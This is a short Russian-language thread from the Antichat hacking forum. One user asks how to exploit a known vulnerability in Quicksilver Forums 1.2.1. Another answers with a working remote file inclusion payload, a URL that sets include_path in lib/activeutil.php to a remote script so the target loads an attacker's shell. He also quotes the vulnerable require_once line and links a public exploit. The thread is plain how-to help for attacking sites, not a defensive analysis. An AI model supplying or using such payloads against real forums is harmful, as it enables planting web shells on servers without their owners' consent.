Форум АНТИЧАТ - Quicksilver Forums 1.2.1

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Quicksilver Forums 1.2.1 (https://forum.antichat.xyz/showthread.php?t=29270)

CaH9	17.12.2006 01:03

Quicksilver Forums 1.2.1

http://www.securitylab.ru/vulnerability/273870.php
люди помогите разобраться с уязвимостью , как ее использовать ?
P.S в поиске пусто

kyzmi4

17.12.2006 02:14

О.o очень просто. Береш уязвимый форум и подставляеш в адресной строке:
lib/activeutil.php?set[include_path]="сайт с шеллом например rst"

Пример:
например есть сайт с форумом http://localhost
Там есть форум http://localhost/forum/
Пишем: http://localhost/forum/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?

CaH9	17.12.2006 13:41

а что означает [include_path] ???

kyzmi4

17.12.2006 15:44

http://www.milw0rm.com/exploits/2356

require_once $set['include_path'] . '/lib/bbcode.php';

Кароче [include_path] так и оставляй =)

Время: 08:57